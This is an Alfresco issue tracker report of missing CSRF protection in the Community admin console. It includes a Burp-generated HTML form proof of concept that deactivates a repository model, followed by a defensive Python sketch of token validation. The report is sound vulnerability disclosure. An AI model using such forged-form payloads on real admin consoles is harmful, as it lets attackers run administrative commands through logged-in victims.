Alfresco / ALF-21809

The Community admin console isn't using the CSRF prevention token

    Details

    • Security Severity:
      Medium

      Description

      On security testing of a vanilla install of Community Edition 2016-12 on Debian Jessie, I noted that in the repo admin console the alf-csrftoken URL parameter is set to "null", and the form requests have no alf-csrftoken set.

      On testing I was able to issue a CSRF to deactivate a model; presumably any other admin console commands can be run via CSRF if an admin who is logged into the Repo console visits a malicious web page.

      <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <form action="http://192.168.56.103:8080/alfresco/s/admin/admin-repoconsole?t=%2Fadmin%2Fadmin-repoconsole&alf-csrftoken=null" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="repo-cmd" value="deactivate model model1" />
      <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>
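As an added illustration, not Alfresco's own code, here is the kind of server-side synchronizer-token check whose absence the report describes: a per-session token must accompany every state-changing request, and the forged form above, which carries only alf-csrftoken=null and no session-bound token, is rejected while a legitimate console submission is accepted. The Session, Request and handle_repo_cmd names are assumptions for the example; only the parameter name alf-csrftoken and the repo-cmd field come from the report.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

TOKEN_PARAM = "alf-csrftoken"  # parameter name observed in the report


@dataclass
class Session:
    # One unguessable token per authenticated session (assumed design).
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    params: dict                      # merged URL and form parameters
    headers: dict = field(default_factory=dict)
    session: Optional[Session] = None # session resolved from the cookie


def csrf_ok(req: Request) -> bool:
    """Return True only if a state-changing request carries the session's token."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True                   # read-only methods need no token
    if req.session is None:
        return False                  # no session, nothing to bind the token to
    supplied = req.params.get(TOKEN_PARAM) or req.headers.get(TOKEN_PARAM)
    # A missing token, or the literal "null" a JS client serialises when it has
    # no token at all, is never a valid credential for the request.
    if not supplied or supplied == "null":
        return False
    return hmac.compare_digest(supplied, req.session.csrf_token)


def handle_repo_cmd(req: Request):
    """Admin console command endpoint guarded by the CSRF check."""
    if not csrf_ok(req):
        return 403, "CSRF token missing or invalid"
    return 200, "executed: " + req.params.get("repo-cmd", "")


# Constructed sample: the forged POST from the PoC above. The victim's browser
# attaches the session cookie, so a session is present, but the token is "null".
ADMIN_SESSION = Session()
FORGED = Request("POST", {"repo-cmd": "deactivate model model1", TOKEN_PARAM: "null"},
                 session=ADMIN_SESSION)
# The same command submitted by the real console, which knows the session token.
LEGIT = Request("POST", {"repo-cmd": "deactivate model model1",
                         TOKEN_PARAM: ADMIN_SESSION.csrf_token}, session=ADMIN_SESSION)
```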

              People

              • Assignee: Closed Issues
              • Reporter: Simon Waters (Inactive)
              • Votes: 0
              • Watchers: 4
